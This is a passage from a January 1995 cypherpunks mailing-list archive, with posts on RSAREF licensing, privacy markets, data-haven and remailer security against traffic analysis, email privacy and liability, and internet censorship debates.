  Mail's authentication and encryption capabilities. Christopher
  Allen, President of Consensus Development adds "The PEM standards
  have been under development for a couple of years and only now are
  coming to fruition. The ability to offer both freeware developers
  and commercial software vendors a license to RSAREF will kickstart
  the adoption of PEM-capable mail software."

  Consensus Development will be creating an email discussion list for
  software developers interested in RSAREF. To join the discussion,
  send a message to <listproc@consensus.com> with the body of the
  message requesting "subscribe RSAREF-DEV-L firstname lastname".


Background
- ----------
  The RSA cryptosystem was invented and patented in the late 1970's
  by Drs. Rivest, Shamir, and Adleman, at the Massachusetts Institute
  of Technology, who started RSA Data Security in Redwood City,
  California, in 1982. Digital signatures are produced using the RSA
  Cryptosystem, which is a public-key cryptosystem. Each user has two
  keys - one public and one private. The public key can be disclosed
  without compromising the private key. Electronic documents can be
  "signed" with an unforgeable signature by using a
  document/private-key combination to produce a signature unique to
  the author and particular document. Anyone using an application
  that supports RSAREF and has the public key of the author can
  subsequently verify the authenticity of the document.

  Applications of digital signatures are endless: expense reports,
  electronic forms and purchase orders, contract revisions,
  engineering change orders, even tax returns can be electronically
  signed to speed electronic document flow and eliminate fraud.
  Furthermore, digital signatures can also be used to detect any
  virus before a program is executed, since any change whatsoever is
  detected. One reason that the paperless office has never
  materialized is that paper must still be printed so that
  handwritten signatures can be applied. RSAREF eliminates that
  necessity. Applications supporting RSAREF could have prevented last
  year's computer fraud at Dartmouth College, in which students were
  tricked into missing an important midterm by a fraudulent
  electronic mail message claiming to be from university faculty.


Corporate Profiles
- ------------------
  RSA Data Security, Inc. <URL=http://www.rsa.com/> is the
  acknowledged world leader in encryption technology, with over three
  million copies of its software encryption and authentication
  installed and in use worldwide. RSA is a defacto standard for
  encryption and digital signatures, and is part of existing and
  proposed standards for the Internet, CCITT, ISO, ANSI, IEEE and
  business and financial networks around the globe. RSA develops and
  markets platform-independent software developers' kits, end-user
  products, and provides comprehensive consulting services in the
  cryptographic sciences. RSA technology has been embedded in the
  products of many companies, including Microsoft, IBM, Apple,
  Oracle, General Magic, DEC, Sun, Novell, Lotus, Motorola, Northern
  Telecom, AT&T, WordPerfect, General Electric, Hughes Aircraft, and
  many others. The company is headquartered in Redwood City,
  California.

  Consensus Development Corporation <URL=http://www.consensus.com:8300/>
  is a software development and consulting firm specializing in the
  support of organizations that need long-distance collaboration via
  wide-area networks and the Internet.Consensus Development has been
  offering consulting and software tools in the area of collaboration
  support since 1988 and is based in San Francisco, California.
  Clients include Aladdin Systems, American Information Exchange
  (AMIX), America Online, Apple Computer, Attain, Authorware,
  Berrett-Koehler Publishers, Claris Corporation, Component
  Integration Laboratories, Connectix Corporation, Digicash bv, Group
  Technologies, InterCon, ON Technology, Portfolio Systems, RSA Data
  Security, Ronin Publishing, Software Ventures, Visa International,
  and Xanadu Operating Company.

Contact
- -------
  Kurt Stammberger
  RSA Data Security, Inc.
  415/595-8782
  <kurt@rsa.com>

  Christopher Allen
  Consensus Development Corporation
  415/647-6383
  <ChristopherA@consensus.com>

$$

- ------------------------------------------------------------------------
...Christopher Allen                  Consensus Development Corporation..
...<ChristopherA@consensus.com>                   4104-24th Street #419..
...                                        San Francisco, CA 94114-3615..
...                                        o415/647-6383  f415/647-6384..
...Mosaic/WWW Home Page:                                               ..
...Consensus Home Page    ..
-----END PRIVACY-ENHANCED MESSAGE-----
Created with RIPEM Mac 0.8.5 b1






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Mon, 9 Jan 95 18:45:28 PST
To: cypherpunks@toad.com
Subject: Privacy markets
Message-ID: <gate.qX7oyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


mkj@october.ducktown.org wrote:
> Bottom line: Anonymity is the only available tool which puts control
> over my own privacy firmly into my own hands, where it belongs, and
> does so without infringing on anyone's freedom of speech.  Certainly

Some months ago I extended this to the concept of privacy markets - where
individuals will be able to disclose their 'truename value' to providers
of services (such as libraries, publications) whose marketing would benefit,
in lieu of cash. I rather think big business is in a better position than
government to exploit the 'profiling' fallout of universal use of truenames.
In the hope of increasing the declining signal content on the list, I'm 
reposting my article:
======================
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#35, 31/October/1994: Selling privacy as a commodity

It was once said that you should never post publicly to
cyberspace what you don't want to see in tomorrow's
newspapers. While newspapers are rarely interested in your
idle thoughts, others are. Future employers, advertisers
and an army of 'user profilers' have begun to exploit the
availability of huge data banks of Net traffic, just
waiting to be indexed by your names and opinions.

It is already possible to buy CD-ROM or tape archives of
posts to newsgroups on the Internet. Collecting newsgroup
posts as they arrive is trivial. Apart from ordinary
Internet connections, all newsgroups are available on one-
way, open-access satellite data broadcasts. As traffic
flows in, it can be indexed and backed up on extremely
cheap storage media such as Digital Audio Tape, for later
search and retrieval.

While the US National Security Agency is naturally one of
the best at hunting for signs of incorrect thinking in
cyberspace, several techniques to search large volumes of
data by very flexible criteria are publicly available.
Electronic writing is one of the best sources for
employers to learn the views of prospective employees. The
groups people participate in can also form useful inputs
to consumer profiles. Some companies have already started
offering directory services based on posts to USENET, the
semi-official collection of major newsgroups. It is easy
to imagine Profiles-R-Us shops that sell dossiers on any
individual, detailing political, religious and sexual
preferences, and other interesting tidbits - all the nasty
things you ever said about Microsoft, for instance!

Public discussion is of course just that, and it's
ridiculous to attempt to prevent it being put to use for
purposes not originally intended. The remedy to an
invasion is to build walls; when the invasion is one of
privacy, the walls are technological. Some pioneers are
already protecting themselves through the use of
encryption, digital signatures, and multiple pseudonyms -
making it impossible for profilers to associate opinions
with real people.

In a way, the Invasion Of The Profilers is a good thing -
it will make individuals realize what little privacy they
have, and teach them the value of privacy. Not everyone
will want to seal themselves in private cocoons. Most will
not object to some loss of privacy, but in exchange for a
(not necessarily monetary) share of the profilers'
profits. Individuals will control their privacy and
selectively reduce it when it benefits themselves.

A particularly useful application of this is in an
electronic public library. Once access to data is severely
restricted to protect intellectual property rights, the
Internet as a source of knowledge for everyone will die,
unless libraries are opened to provide information free of
cost. Such libraries need not survive on subsidies;
rather, they can ask for a copy of any information base in
cyberspace from all publishers. By limiting access to
individuals who are willing to give up some privacy, the
library and publishers will benefit from the sale of
users' access records to advertisers. Advertisers will be
delighted, as most other inputs for profiling in a privacy-
aware society will be unavailable. Finally, users will get
free access to information if they so choose, at a cost
that they can agree to.

While one can be frightened by the ease with which a
multitude of Big Brothers can monitor the citizens of
cyberspace, technology, as always, has something for
everyone. As it becomes easier to search through
electronic communications, it also becomes easier to
protect privacy to varying degrees. Individuals will be
forced to be aware of risks to their privacy. With the
opening of markets for profiles, privacy may finally find
a concrete value.

Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).
--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 22:55:04 PST
To: cypherpunks@toad.com
Subject: Re: DH Traffic Volume Analysis
Message-ID: <199501100612.BAA22933@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Paul J. Ste. Marie writes:
> One problem that remains would be a trail left by the increased traffic 
> to/from a DH vs a normal user.  That could only be fixed by a multitude of 
> DH sites.

Ubiquitous remailing -- having a significant portion of the net population
bouncing around randomly fluctuating encrypted traffic as background noise -- 
should help to cover both remailers and data havens. It would be nice to
have more people firing off occasional encrypted stuff to muddy the waters.
(Picture yourself in Bridge over the River Kwai if it helps ;)

 -L. Futplex McCarthy; PGP key by finger or server

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxIkLGf7YYibNzjpAQGZfgQAp464Szt+W1pvcHQRLH39kmato3tQaHIn
mNSNjeXBwWqrgIXYoLAQfcX1qvVb0NJQikGc4P7Xo/o7Aa2LOIWTt6TRxXlUkaod
gmYr6XGvoCST1eciMeMTKRjVRJgA6p4/GmQwQwmvFtTus1waS5T+RsNX0nbCu3ng
eg3sZ5s7pKI=
=973H
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxIlNCoZzwIn1bdtAQFGBQF/Zl+lLTMyM55oRF2PSsA0ld13i/I1uyvW
sD3C3JkqgQ9XsDjGquKXoPwDCsAEgN6E
=7MWJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@gate.net
Date: Mon, 9 Jan 95 22:54:53 PST
To: pstemari@erinet.com (Paul J. Ste. Marie)
Subject: Thoughts on Data Havens
In-Reply-To: <9501100322.AB12220@eri.erinet.com>
Message-ID: <199501100630.BAA10057@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text


Re: 
> At 07:25 PM 1/9/95, dfloyd@io.com wrote:
> > ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
> >it is trivial to use traffic analysis to find where the DH lies.  Just
> >monitor traffic from/to the remailer and do a series of store/retrives.
> >Then for confirmation, forge a mail from the dh site to the remailer with
> >the password (obtained from sniffing) to yourself. ...

This is a known weakness of the wizvax style remailers.  It is a shame that
they are so easy for naive users to use - while I like the idea of an easy
to use remailer, I have to shudder at how many people think that they are
a secure system, especially when the reason they use them is usually because
of a very real fear of the possible consequences if their lifestyle becomes
public.
 
> Hmm, hmm.  Using c'punk remailers with encrypted send blocks fixes one 
> problem, especially if the c'punk mailers do some sort of file splitting and 
> reassembly along the lines of what happens to IP packets that are too large 
> for a given link.  What would also help would be a mechanism for randomly 
> varying the encrypted send-to block.  The password replay attacks can be 
> fixed by encrypting the transmitted password along with a timestamp/sequence 
> number.

Post a new PGP key and encrypted address block weekly to alt.data.havens,
alt.2600, or a stegoed picture to alt.binaries.pictures.whatever.  If you
are limiting usership, perhaps an autoencrypting majordomo list. 

If you do decide to go the steganography route, keep in mind that users
on other platforms will want to use your DH and pick your stego program
accordingly.  As a Mac user, few things irritate me as much arj and zip
files on ftp sites.  gzip is a pain also, but at least I can un-gzip in
my shell account before downloading.

> One problem that remains would be a trail left by the increased traffic 
> to/from a DH vs a normal user.  That could only be fixed by a multitude of 
> DH sites.

One way of solving the traffic analysis problem is to have the DH account
also act as a remailer.  It would also be a good idea to only allow DH
commands to be executed if the encrypted (mandatory) control message arrived
from another remailer account - people knowledgeable enough to be using a
dh will probably not mind if they are "forced" to route traffic through
the remailer network - anyone paranoid enough to be a client is going to
tack your address block on the end of a long chain they created themselves.
As an added security measure, when a valid control message is received,
an identical length stream of random garbage should then be encrypted and
passed into the remailer pool.  This would be easier if remailers supported
some sort of bit sink command to trash a message rather than pass it along.

Joe Block <jpb@gate.net>
No man's life, liberty or property are safe while the legislature is in session.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 22:54:30 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous videoconferencing applications
Message-ID: <199501100644.BAA23178@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Alan Bostick writes:
> I thought so too, at first; but then I thought of this obvious application:
[lurid details omitted ;]

"Ever seen your children bound and blindfolded from across the globe ?  
You will...."

> Whether technology is going to be developed for the convenience of 
> kidnappers and terrorists is an open question. 

I'd answer, "Undoubtedly," but I wonder just how readily available such
technology would be to, uh, the rest of us.
 
> But there is clearly 
> at least this one clear use for anonymous video conferencing.

Perhaps headhunters would find it handy for anonymous job interviews with
candidates who prefer to remain nameless, but not jobless....

 -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxIrqmf7YYibNzjpAQGE9AQAlSGdkOEWsbXICCygoa4Sr+Gj9y91xHeS
3YpA40lODXDmvAoIxWRtpOt2k3a1G381xwxaSCh7b+Wh90V4dknS/ysvu/VLLdUG
k1H/eGttn+TzcVPARc0fxExDV5yNxueDRaqil1sDnsgtVyBMzCmu6jdHKL4molku
5zN0SLh2RLY=
=zmcz
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxIstCoZzwIn1bdtAQFiIQF9Ho6rMKp+ii7kSgFalxf8j+05ZHTFkxCc
/LQUDOvxy1jXK5+EpaOwP/LyI5fru7YQ
=ZD2g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Mon, 9 Jan 95 23:54:41 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100432.WAA00738@einstein.ssz.com>
Message-ID: <199501100754.BAA23939@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: root <root@einstein.ssz.com>
[...]
> > What you define as pornography doesn't mean shit, it's what the media and 
> > jornalists and fundies etc.. decide is pornographic that you gotta watch 
> > out for. [...]
> >
> I am well aware that what I personaly consider pornography carries little
> weight.

One minor nit.  Pronography is not illegal, obscenity is what is regulated.
The difference between the two the fine line upon which we tread.

> As to data havens being dangerous to run...I don't know. At the recent
> HoHoCon there was a long discussion 'bout networks hidden within networks
> that was very intriguing. If Doug Barnes is reading this he may be
> willing to reiterate some of the talk. I do know that at the moment my
> partners and myself are looking at remailer software running under Linux
> and data havens are something that we have discussed.

That was my talk, and if I ever get around to it I will be putting my notes
and design details for underground internetworking up on the web.  These
notes include the slides from the talk and the technical notes relating to
this issue...

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 23:31:44 PST
To: cypherpunks@toad.com
Subject: Re: Traffic generation
Message-ID: <199501100736.CAA23603@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Joe Block writes:
> As an added security measure, when a valid control message is received,
> an identical length stream of random garbage should then be encrypted and
> passed into the remailer pool.  This would be easier if remailers supported
> some sort of bit sink command to trash a message rather than pass it along.

Lance Cottrell's Mixmaster software supports this -- just use Anon-To: null
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxI43yoZzwIn1bdtAQFNJwGAyLeVNnXjphXZFF9tznd4BI09+e4ec3z7
XjLgNg3qtNoxUM44ZkW0xsME+ot5B4A/
=q5OQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolb <carolb@barton.spring.com>
Date: Tue, 10 Jan 95 01:16:36 PST
To: Christopher Allen <ChristopherA@consensus.com>
Subject: Re: PRESS RELEASE - RSA Licenses Co
In-Reply-To: <v02110103ab37f1277f38@[198.68.251.11]>
Message-ID: <Pine.3.89.9501100315.A24297-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks, that was nice & handy, & scary.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 10 Jan 95 00:49:55 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com>
Message-ID: <m0rRcHN-0002GeC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> "I'm Wozz" <wozzeck@phantom.com> writes:
> 
>  > Any professional knows better than to read private
>  > mail...and if this is so...then they aren't worthy of having
>  > a site to run
> 
> For legal purposes, most BBS systems declare that for the
> purposes of the ECPA, there is no such thing as private mail on
> their system.  The Sysop is then free to read anything he wishes
> to.  This policy is clearly stated in the user agreements of
> almost all BBS systems offering access to the public.

This may be true of public access BBS systems, but on corporate
sites the smart money pulls the other way.  Smart corps avoid
reading email for the same reason they avoid listening in on 
voice conversations (except in telemarketing etc.).  Likelihood
of a corporation being held liable for any abusive use of a system
by an employee is drastically outweighed by the likelihood of
a costly wrongful dismissal suit should any investigation of private
correspondence reveal some private fact (e.g. they are gay,
they are having an affair, etc.) that leads to their dismissal
(and thus loss of access to the system!).  In other words, abuse by
managers of their supervisory priveleges is far more likely to come 
back and haunt the organization than abuse by employees, in legal
terms anyway.

At a recent seminar on doing business on the internet I stated
this opinion to an audience that included at least 20 lawyers.
None disagreed, the numbers are clear enough.  One added the
qualification, which I agree with, that pirated software that
the organization directly benefits from is a specific exception
where the organization is guilty until proven innocent.  But
he hastened to add that the rest of the argument stood up.  We
agreed that a 'software audit' program such as the SPA provides
could meet that need without compromising end user privacy.

Slowly I believe that Prodigy, AOL, etc., are getting this message,
that it costs more to censor than not to.  Reading of the week:
"Defending Pornography", by the head of the ACLU (yes a woman) who
argues that the fight against censorship is equivalent to the fight
for women's rights, and historically has always had the same enemies.
Kind words on the jacket from Friedan and other mainstream feminists.
 
>  > as for PGP, this is an individual thing....I'm sure mike
>  > has no such objections...i know here at MindVox we
>  > don't...in fact, we installed it for the users
> 
> Many BBS Sysops forbid PGP and kick users off their systems who

I can't speak to the paranoia of garage system operators but:

> use it.  They cite fears of encrypted illegal porn and credit
> card numbers passing through their systems, and potential legal
> liability.

We work with a lot of large corporate clients using the internet.
We have recommended PGP as a means of securing privacy for all
corporate communications (note I don't use it from this site as
I don't download all mail from here before reading it, a GUI
PGP that was usable would go a long way to overcoming resistance)
and deal only with BBS operators who fully support user privacy.
As I suggest, we have recommended strongly against investigating
the contents of mail etc., and have been backed by the lawyers
of these organizations who see a nightmare of legal liability
even in the *ability* to look. (When does the ability to look
become an obligation to record?  Go ask your service provider!)

It seems to me that, although there have been some misguided
prosecutions with serious impact on the livelihoods of some
small operators, the defense that the operators did not know
what was moving through their site has held up.  Criminal
liability hinges on knowledge of the act - you cannot be held
criminally liable unless you knew what was going on... period.
Exceptions to that ('guilty until proven innocent' doctrine
that blames the publisher and forces them also to be a censor)
are offensive to the principles of both the law and liberalism.
I would cite broadcasting law as an example of such an abusive
body of law, and note that it was written entirely in this century.

The 'common carrier' status is not a silver bullet, it obligates
carriers to co-operate with authorities to maintain that status,
as it is specially granted.  It is actually better to let it evolve
by precedent, a 'de facto' common carrier defense, as that way it
cannot be withdrawn by a government without special legislation that
itself may be overturned by the courts (in constitutional democracies).

In other words, keep on using PGP, ditch providers who forbid it, and
recommend it to every company you can.  Once it becomes clear to Ford
and Kraft and GM that a decision to hold a BBS operator responsible
for traffic that moved through his system without his intervention,
is also likely to deem *them* responsible for employees (and suppliers!)
once they have established internally a comfortable precedent of just
leaving the mail alone... very expensive and disruptive to overturn...
you can be damn sure that some serious campaign contributions will swing
over to the privacy advocates.

I make these assumptions:  that corporate America, as commercial entities,
have no interest in knowing about anything that is not directly related
to the making of money.  It does not want its business complicated by
the necessity to become a censor of employee discussions.  Piss tests
etc. were an example of DoD over-control forcibly imposed on the private
sector... with predictable results like the Intel Pentagronk (who ever heard
of a serious system being built entirely without benefit of psychoactives?)

With DoD spending disappearing, the military-industrial complex shrinking,
this economic influence is reduced and we get more overt legislative attempts
to exert control like the Clipper, motivated by 'civilian' concerns like
'kiddie porn' (gee Japan has no such laws and it hasn't collapsed yet, has
lower incidence of child molestation too...) and 'violent porn' (same story,
you can get it in Denmark and they have less rape than here...) and 'stolen
goods' (which can be moved around easily enough by a hundred other means).

In other words, the same lame excuses that politicians use every time they
want to control people.  But I don't think business is with the program,
I think corporations only react to fear of liability etc. (which is kept
heightened by governments with their own agenda) which can be reduced by
education and measured by intelligent risk analysis.  In my opinion, as 
the architect of several risk management systems, the latter demonstrates
that the danger is less than 'most BBS operators' think, and it arises
from different factors than they think, to wit:

  If a small service provider is prosecuted for moving alt.binaries.snuff
  through his system, it is not because he carries it: so do 500 other
  service providers, and they can't prosecute them all.  It is because
  he was careless enough to indicate in non-PGP-encrypted email that he
  was intending to make a political donation to the prosecutor's opponent.
  Barring a nationwide crackdown, where the initial prosecution is always
  carefully chosen for minimum public sympathy, these random prosecutions
  are going to be motivated by the petty whims of cops and bureaucrats.
  I see no reason why one would leave one's opinions open to them to read.
  All that can do is make you a target, and who needs to be a target ?

That said, I can understand their fear.  If I were operating an internet
service today, I doubt I would have posted this to cypherpunks (which I
read primarily to protect my own privacy, that of my clients, and advise
them on effective means of privacy protection).  Now I'm probably on an
NSA list somewhere... good thing I'm up here in Canada...!

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 10 Jan 95 03:24:11 PST
To: cypherpunks@toad.com
Subject: Julf gets some negitive press!!!
Message-ID: <Wmc4lKjqRuy3075yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I found this surfing USENET. Very interesting...


From: cmfaltz@panix.com (Titania)
Subject: SIEGAL STRIKES AGAIN -- HEADS UP, FOLKS; CENSORS GETTING READY
Date: 5 Jan 1995 09:28:40 -0500
Organization: The Q Continuum
Lines: 112
Message-ID: <3egvmo$lfg@panix.com>
NNTP-Posting-Host: panix.com


Chck the blurb at the end of this reprint from the San Francisco
Chronical -- bitch Siegel is complaining about net hoods again, while
supplementing her income providing a how-to book for those hoods -- oh,
she would say her book is informative, bringing Net abuses and scams to
the public knowledge, but human nature being what it is, how much do you
wanna bet scum have been buying up her little tome for ideas?  Check 'er
out, everyone -- she's the face of the enemy -- get ready.


Reprinted from Monday's SF Chronicle

*Anarchy, Chaos on the Internet Must End* Martha S. Siegel

   Elections are over, and, for better or worse, recognized
leadership is installed and working in most places.  Yet, in
Cyberspace, the electronic world dominated by the much vaunted
Internet, there is not much order.  This huge international
computer web tying together about 30 million people is governed
by no one.

   What an amazing state of affairs.  The most powerful commu-
nication medium ever invented is being left to the equivalent of
mob rule.  Last year was the year of the Internet in the media.
Clearly it is now in the mainstream.  Nonetheless, judging by
what you read or hear, the key question of who runs it is not
even an issue.  It is more fun, after all, to contemplate
shopping in an electronic mall or how to order a pizza through a
modem.

   No matter, if you scratch the surface of this big, happy
party, the need for firm direction is all too obvious.  Also
reported in the press is an expanding array of Internet
problems.  Unregulated broadcasting of sexually explicit
material that is readily available to children usually heads the
list, but on-line sexual harassment, profanity, defamation,
forgery and fraud run close seconds.

   The secretiveness that computer communications allows is a
special reason why abuse is easy.  National and personal
security are serious considerations when anyone can, with
complete anonymity, send encrypted information worldwide via the
Internet.  Such problems are further exacerbated by a computer
in Finland called the Anonymous Server, which exists for the
sole purpose of laundering computer messages, much like dirty
money is laundered through small island nations.  Consequently,
if you want to, say, threaten someone with death, your risk of
retribution is small, courtesy of the Anonymous Server.

   Nowhere are Cyberspace difficulties more evident than in the
inevitable swing toward Internet commercialization.  The widely
reported turf war rages onbetween academic factions that
controlled Internet before it went public and business newcomers
who now want to access its huge audience.  Electronic attacks on
business people by means ranging from computer insults, called
flames, to assorted forms of electronic vandalism, persist
uncontrolled.  Worst of all are the "canceller robots," computer
programs meant to erase the communications of anyone the hackers
who usually launch them want to silence.

   These self-styled vigilantes routinely challenge free speech
in Cyberspace unabated.  Internet access providers, companies
that connect people to the Internet for a profit, likewise
assume the role of censors, arbitrarily closing accounts of
those whom they disapprove.

   Given its international nature, one obvious way to bring much
needed order to the Internet is through diplomacy.  The United
States should lead in this.  A good beginning might be to urge
the Finnish government to deactivate the Anonymous Server.
Diplomacy could also help to establish an international standard
of recognizing laws existing at the point of origin as
controlling the message sender.

   When conflicts arise, governmental diplomacy should again be
the answer, just as it is with other trade and communications
issues.  Next, laws already regulating behavior in the real
world should be applied to Cyberspace.  This is already taking
place on a case-by-case basi, but the process is too slow.  The
Supreme Court should act to create a precedent stating that
crime is crime, even when the criminal instrument is a computer
keyboard.

   In the United States, legislation should be passed making
Internet providers common carriers.  This will get them out of
the business of censorship and under the guiding hand of the
Federal Communications Commission.

   People need safety and order in Cyberspace just as they do in
their homes and on the streets.  The current state of the
Internet makes it clear that anarchy isn't working.  If
recognized governments don't find a way to bring order to the
growing and changing Internet, chaos may soon dictate that the
party is over.

   ** Martha S. Siegel is the author of "How to Make a Fortune
on the Information Superhighway" and CEO of Cybersell in
Scottsdale, Arizona


   In any case, the San Fransisco Chronicle may be reached at:

   	Letters to the Editor,
	San Fransisco Chronicle
	901 Mission Street
	San Fransisco, Ca 94103

   or you can fax a letter at (415) 512-8196







- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
       Anyone who hates Dogs and Kids Can't be All Bad. -- W. C. Fields

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxJtEMlnXxBRSgfNAQGz6gf/bwcCfyl+Cbktb/rGHUoudNWRKgXBjaNC
73V2FADhPRK+GIocliO6n/jNKetgfmvR7vKRkC98DuL5eJ4nek6XBqZ1eMBv0gBU
FWSyRulYy3DJghWTUwFFuzm5GgNgC7j3kHOAdoLDys7FPaD7VprxD6esiIZnE/Ao
rG2LqXrjQ3ofHqKiCxpldKJv51ttGZaWCbT39IfJOoB9dYs6vPTaDf7aOuqHfUKi
+ZgwEwf/tM0x2BX6GuKCNXhFnPjL947kTQuSQ8JEcwHbvqAueMFaehNOtRczqwSj
CBtwUYF9NIPmZ1kqEtJBQegDqj71xcD3c17NpjFAVjx1dz4ceIBRVQ==
=FTmU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 10 Jan 95 04:07:20 PST
To: mccoy@io.com (Jim McCoy)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100754.BAA23939@pentagon.io.com>
Message-ID: <199501101202.GAA00328@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> [...]
> > > What you define as pornography doesn't mean shit, it's what the media and 
> > > jornalists and fundies etc.. decide is pornographic that you gotta watch 
> > > out for. [...]
> > >
> > I am well aware that what I personaly consider pornography carries little
> > weight.
> 
> One minor nit.  Pronography is not illegal, obscenity is what is regulated.
> The difference between the two the fine line upon which we tread.
>
If this is so then everything I have read or seen misses this minor point
completely. Every press release, speech, etc. that I see uses the term
pornography, not obscenity. TV preachers, news anchors, newspapers, DA's,
etc. consistently use the term pornography. The state of Oregon specificaly
legalized pornography, not osbcenity. 

I think from a legal standpoint there is little difference between the two.
 
> > As to data havens being dangerous to run...I don't know. At the recent
> > HoHoCon there was a long discussion 'bout networks hidden within networks
> > that was very intriguing. If Doug Barnes is reading this he may be
> > willing to reiterate some of the talk. I do know that at the moment my
> 
> That was my talk, and if I ever get around to it I will be putting my notes
> and design details for underground internetworking up on the web.  These
> notes include the slides from the talk and the technical notes relating to
> this issue...
>
Sorry, for the slip.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Tue, 10 Jan 95 06:42:27 PST
To: cypherpunks@toad.com
Subject: Response to CBS News "drive-by" attack on the internet
Message-ID: <199501101442.GAA21852@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


January 10, 1995


Eric Ober
President, CBS News
524 W. 57th Street
New York, NY 10019


Dear Mr. Ober:

In its 1/9/95 evening news broadcast, CBS aired a segment presenting
a number of people who argued that the content of school libraries, 
written communications, and electronic communications should be censored 
for the common good.  Since CBS did not present anyone with an opposing 
point of view, I assume the position presented is believed by CBS to be 
correct and not controversial.

At first I was concerned about your network's apparent lack of support of
first amendment rights to freedom of speech and of the press. Then I 
realized that these freedoms are only to discuss topics which could not 
result in physical or moral harm to anyone.

I have some friends who share your concerns.  They have been trying
for years to reduce availability of morally dangerous materials like 
_The_Catcher_In_The_Rye_ and _Heather_Has_Two_Mommies_.  They will
be so excited to hear that you are now on their side.  

Sincerely,


Brad Dolan
bdolan@well.sf.ca.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
